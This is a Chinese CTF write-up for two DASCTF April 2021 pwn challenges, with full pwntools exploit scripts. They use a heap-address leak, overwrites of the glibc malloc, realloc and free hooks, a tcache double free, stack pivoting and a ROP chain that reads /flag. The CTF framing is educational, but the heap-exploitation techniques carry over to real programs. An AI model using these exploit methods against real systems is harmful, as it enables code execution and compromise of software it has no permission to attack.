2021DASCTF四月赛Writeup

fruitpie

malloc 申请 size 没有上限，后面会输出堆地址。

申请大 size 堆，以 mmap 方式分配，得到的堆地址在 libc 附近。

需要用 realloc 调整堆栈让 onegadget 生效，最后关闭了 stdout ，手动打开exec 1>&0

exec 1>&0 - luooofan

EXP

from pwn import *
context.log_level = 'debug'
context.binary = "./fruitpie"
context.terminal = ['tmux','sp','-h']

p = process("./fruitpie")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
# p = remote("54f57bff-61b7-47cf-a0ff-f23c4dc7756a.machine.dasctf.com",51302)
# libc = ELF("./libc.so.6")

p.recvuntil("malloc:")
# p.send(str(0xffffff))
p.send(str(0x23002))

p.recvuntil("0x")
heap_addr = int(p.recvuntil('\n',drop=1),16)
log.info("heap_addr:"+hex(heap_addr))
libc_base = heap_addr - 0x5ac010
log.info("libc_base:"+hex(libc_base))

malloc_hook = libc_base + libc.sym['__malloc_hook']
log.info("malloc_hook:"+hex(malloc_hook))
realloc = libc_base + libc.sym['realloc']
log.info("realloc:"+hex(realloc))
realloc_hook = libc_base + libc.sym['__realloc_hook']
log.info("realloc_hook:"+hex(realloc_hook))

offset = realloc_hook-heap_addr
log.info("realloc_hook-heap_addr:"+hex(offset))

onegadget = libc_base + 0x4527a
log.info("onegadget:"+hex(onegadget))
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
# gdb.attach(p,"b *$rebase(0xCE1)")

p.recvuntil("set:\n")
p.sendline(hex(offset))
payload = p64(onegadget) + p64(realloc+8)
p.recvuntil("Data:\n")
p.send(payload)


p.interactive()

ParentSimulator

检测启动用户是否为 root ，hook getuid 返回值为 0 ：

#filename:hook.c
#gcc -shared -fPIC hook.c -o hook.so
#include <stdio.h>
unsigned int getuid(void)
{
    puts("[+]hook");
    return 0;
}

Glibc 2.31 版本下的 UAF ，堆 size 固定为 0x100

从 glibc 2.29 开始就在 tcache 新增了 key 用于防止 double free 。题中堆块释放后，只有调用 sub_196B() 的一次机会修改位于 bin 中堆块内容。

程序要用 root 账户运行，可以 peatch 跳转汇编指令，我是 hook getuid 返回值为 0 ：

#filename:hook.c
#gcc -fPIC hook.c -o hook.so
#include <stdio.h>
unsigned int getuid(void)
{
    puts("hook");
    return 0;
}

1	p = process("./pwn", env={"LD_PRELOAD":"./hook.so"})

libc gadget

用 666 选项操作一个在 tcache 的堆，泄露出 tcache_struct 地址（堆地址），同时修改 key 实现 tcache double free

申请两次，获得指向同一块内存的指针。释放其中一个到 unsortedbin ，show 另外一个泄露出 libc 地址

程序开了沙盒禁止 execve ，之前学过思路是劫持 free_hook 为 setcontext+53 ，设置寄存器构造出一个 read 输入，输入 orw ropchain 并跳转。

之前 setcontext 做的题目：https://www.mrskye.cn/archives/233/

从大佬博客学到新姿势，劫持 free_hook 为 libc 的 gadget 栈迁移到堆上的 ropchain

执行 free_hook rdi 的值是被释放的堆地址，rbp 、 rax 都可以被控制，最后调用 leave_ret 实现栈迁移

[rax+0x28] ：leave_ret
[rbp+0x18] ：rax
[rdi+0x48] ：rbp

leave_ret 跳转到 rbp 执行 ropchain ，所以 rbp 是 &(ropchain)-8 。gadget 跳转到 ropchain 的部署：

# free(0x5646d3e43e20)
0x5646d3e43e20: uncontrol area					write start at fd_nextsize								
0x5646d3e43e30: "/flag"      						padding
0x5646d3e43e40: padding      						padding
0x5646d3e43e50: padding      						padding
0x5646d3e43e60: padding      						0x5646d3e43d20(rbp-->ropchain-8)
0x5646d3e43e70: leave_ret					      0x0000000000000000
# chunk ropchain
0x5646d3e43d10: uncontrol area					write start at fd_nextsize
0x5646d3e43d20: padding						      add_rsp_0x18_ret
0x5646d3e43d30: padding						      0x00005646d3e43e48
0x5646d3e43d40: padding						      pop_rdi_ret	<==ropchain
0x5646d3e43d50: address of "/flag"      pop_rsi_ret
0x5646d3e43d60: 0x0000000000000000      pop_rdx_r12_ret
0x5646d3e43d70: 0x0000000000000000      0x0000000000000000
0x5646d3e43d80: open_addr					      pop_rdi_ret
0x5646d3e43d90: 0x0000000000000004      pop_rsi_ret
…………

# free chunk payload
payload="/flag\x00\x00\x00".ljust(0x38,'a')
payload += p64(tcache_struct+0xd10) #ropchunk in chunk6
payload += p64(leave_ret)

# ropchain chunk payload 
payload =p64(0xdeadbeefdeadbeef)+p64(add_rsp_0x18_ret)
payload+=p64(0xdeadbeefdeadbeef)+p64(tcache_struct+0xe38)
payload+=p64(0xdeadbeefdeadbeef)
payload+=ropchain

environ

Libc 中的 environ 里面存了栈地址，根据偏移可以找到 main rip 的栈地址，然后 hijack rip 为 ropchain

这题每个堆可控输入位置从 fd_nextsize 开始，tcachebin 填入的地址 -0x10 。这题 main 的 canary 在很上面，即使会修改 rip 前面的 0x10 空间也不会触发 stack_check_fail

WX20210401-000729

EXP

libc gadget

from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']
context.binary = './pwn'

def menu(choice):
    p.recvuntil(">> ")
    p.sendline(str(choice))

def add(idx, sex, name):
    menu(1)
    p.recvuntil("Please input index?\n")
    p.sendline(str(idx))
    p.recvuntil("2.Girl:\n")
    p.sendline(str(sex))
    p.recvuntil("Please input your child's name:\n")
    p.send(name)

def edit_name(idx, name):
    menu(2)
    p.recvuntil("Please input index?\n")
    p.sendline(str(idx))    
    p.recvuntil("Please input your child's new name:\n")
    p.send(name)

def show(idx):
    menu(3)
    p.recvuntil("Please input index?\n")
    p.sendline(str(idx))   

def delete(idx):
    menu(4)
    p.recvuntil("Please input index?\n")
    p.sendline(str(idx))   

def edit_description(idx ,desc):
    menu(5)
    p.recvuntil("Please input index?\n")
    p.sendline(str(idx)) 
    p.recvuntil("Please input your child's description:\n")
    p.send(desc)

p = process("./pwn", env={"LD_PRELOAD":"./hook.so"})
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

for i in range(8):
    add(i,1,'a'*7)

delete(6)
# leak heap addr
menu(666)
p.sendline('6')
p.recvuntil("gender:")
tcache_struct = u64(p.recv(6).ljust(8,'\x00'))
log.info("tcache_struct:"+hex(tcache_struct))
p.recvuntil("Girl:\n")
p.sendline('2')
# double free tcache
delete(6)

add(6,1,'b')
add(8,1,'b')

# full 0x110 tcache
for i in range(6):
    delete(i)
delete(7)
# free 2 unsortedbin
delete(6)
# leak libc_addt
show(8)
main_arean = u64(p.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
log.info("main_arean:"+hex(main_arean))
libc_base = main_arean - 0x1ebbe0
log.info("libc_base:"+hex(libc_base))

free_hook=libc_base+libc.sym['__free_hook']
log.info("free_hook:"+hex(free_hook))

open_addr=libc_base+libc.sym['open']
read=libc_base+libc.sym['read']
puts=libc_base+libc.sym['puts']
pop_rdi_ret=libc_base+0x0000000000026b72
pop_rsi_ret=libc_base+0x0000000000027529
pop_rdx_r12_ret=libc_base+0x000000000011c371
leave_ret = libc_base+0x000000000005aa48
gadget=libc_base+0x157D8A#0x157BFA
log.info("gadget:"+hex(gadget))
add_rsp_0x18_ret=libc_base+0x000000000003794a
ret=libc_base+0x0000000000025679


for i in range(7):
    add(i,1,'d')
add(6,1,'d')    #malloc from unsortedbin

delete(7)
delete(6)

edit_name(8,p64(free_hook)[:-1])    #allow read 7 bit

add(6,1,'e')
add(7,1,p64(gadget)[:-1])   #allow read 7 bit

payload="/flag\x00\x00\x00".ljust(0x38,'a')
payload += p64(tcache_struct+0xd10) #ropchunk in chunk6
payload += p64(leave_ret)
edit_description(0,payload)

payload =p64(0xdeadbeefdeadbeef)+p64(add_rsp_0x18_ret)
payload+=p64(0xdeadbeefdeadbeef)+p64(tcache_struct+0xe38)
payload+=p64(0xdeadbeefdeadbeef)
payload+=p64(pop_rdi_ret)+p64(tcache_struct+0xe20)  #"flag" in chunk0
payload+=p64(pop_rsi_ret)+p64(0)
payload+=p64(pop_rdx_r12_ret)+p64(0)*2
payload+=p64(open_addr)

payload+=p64(pop_rdi_ret)+p64(4)
payload+=p64(pop_rsi_ret)
payload+=p64(tcache_struct+0x400)
payload+=p64(pop_rdx_r12_ret)+p64(0x50)+p64(0)
payload+=p64(read)

# payload+=p64(pop_rdi_ret)
# payload+=p64(tcache_struct+0x400)
# payload+=p64(puts)
payload+=p64(pop_rdi_ret)
payload+=p64(1)
payload+=p64(pop_rsi_ret)
payload+=p64(tcache_struct+0x400)
payload+=p64(libc_base+libc.sym['write'])

#gdb.attach(p,"b *$rebase(0x19D4)")

edit_description(6,payload)

delete(0)

p.interactive()

environ

from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']
context.binary = './pwn'

def menu(choice):
    p.recvuntil(">> ")
    p.sendline(str(choice))

def add(idx, sex, name):
    menu(1)
    p.recvuntil("Please input index?\n")
    p.sendline(str(idx))
    p.recvuntil("2.Girl:\n")
    p.sendline(str(sex))
    p.recvuntil("Please input your child's name:\n")
    p.send(name)

def edit_name(idx, name):
    menu(2)
    p.recvuntil("Please input index?\n")
    p.sendline(str(idx))    
    p.recvuntil("Please input your child's new name:\n")
    p.send(name)

def show(idx):
    menu(3)
    p.recvuntil("Please input index?\n")
    p.sendline(str(idx))   

def delete(idx):
    menu(4)
    p.recvuntil("Please input index?\n")
    p.sendline(str(idx))   

def secret(idx):
    menu(666)
    p.recvuntil("Please input index?\n")
    p.sendline(str(idx)) 
    p.recvuntil("2.Girl:\n")
    p.sendline(str(1))

def edit_description(idx ,desc):
    menu(5)
    p.recvuntil("Please input index?\n")
    p.sendline(str(idx)) 
    p.recvuntil("Please input your child's description:\n")
    p.send(desc)

p = process("./pwn", env={"LD_PRELOAD":"./hook.so"})
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

for i in range(7):
    add(i,1,'a'*7)
add(7,1,'a'*7)
add(8,1,'a'*7)
for i in range(7):
    delete(i)
delete(7)
for i in range(7):
    add(i,1,'b'*7)
add(9,1,'b'*7)
for i in range(7):
    delete(i)
delete(7)

show(9)
main_arean = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.info("main_arean:"+hex(main_arean))
libc_base = main_arean - 0x1ebbe0
log.info("libc_base:"+hex(libc_base))

free_hook=libc_base+libc.sym['__free_hook']
log.info("free_hook:"+hex(free_hook))
environ = libc_base + libc.symbols["__environ"]
log.info("environ:"+hex(environ))

open_addr=libc_base+libc.sym['open']
read=libc_base+libc.sym['read']
puts=libc_base+libc.sym['puts']
pop_rdi_ret=libc_base+0x0000000000026b72
pop_rsi_ret=libc_base+0x0000000000027529
pop_rdx_r12_ret=libc_base+0x000000000011c371
leave_ret = libc_base+0x000000000005aa48
gadget=libc_base+0x157D8A#0x157BFA
log.info("gadget:"+hex(gadget))
add_rsp_0x18_ret=libc_base+0x000000000003794a
ret=libc_base+0x0000000000025679

for i in range(7):
    add(i,1,'c'*7)
add(7,1,'c'*7)
delete(0)   #add tcache number
delete(1)
delete(7)
# leak heap addr
menu(666)
p.sendline('7')
p.recvuntil("gender:")
tcache_struct = u64(p.recv(6).ljust(8,'\x00'))
log.info("tcache_struct:"+hex(tcache_struct))
p.recvuntil("Girl:\n")
p.sendline('2')
# double free tcache
delete(7)

add(7,1,'b')
edit_name(7,p64(tcache_struct)[:7])
add(8,1,'b')
add(0,1,'b')    #tcache struct
payload = p64(0) + p64(0x7000000000000)
payload = payload.ljust(0xe8,'\x00')
payload += p64(environ-0x10)[:7]
edit_description(0,payload)

# lead steak
add(1,1,'c')
show(1)
stack_leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, b"\x00"))
log.info("stack_leak:"+hex(stack_leak))
main_ret = stack_leak - 0x100
log.info("main_ret:"+hex(main_ret))

# hijact main_ret
payload = p64(0) + p64(0x7000000000000)
payload = payload.ljust(0xe8,'\x00')
payload += p64(main_ret-0x10)[:7]
edit_description(0,payload)
add(2,1,'d')

edit_description(3,"/flag\x00")

payload=p64(pop_rdi_ret)+p64(tcache_struct+0x9e0)  #"flag" in chunk0
payload+=p64(pop_rsi_ret)+p64(0)
payload+=p64(pop_rdx_r12_ret)+p64(0)*2
payload+=p64(open_addr)

payload+=p64(pop_rdi_ret)+p64(4)
payload+=p64(pop_rsi_ret)
payload+=p64(tcache_struct+0x9f0)
payload+=p64(pop_rdx_r12_ret)+p64(0x50)+p64(0)
payload+=p64(read)

payload+=p64(pop_rdi_ret)
payload+=p64(tcache_struct+0x9f0)
payload+=p64(puts)

edit_description(2,payload)
# gdb.attach(p,"b *$rebase(0x19D4)")
menu(6)

p.interactive()

Writeup 汇总

https://shimo.im/docs/V1hLlJ0RoRkI7Si9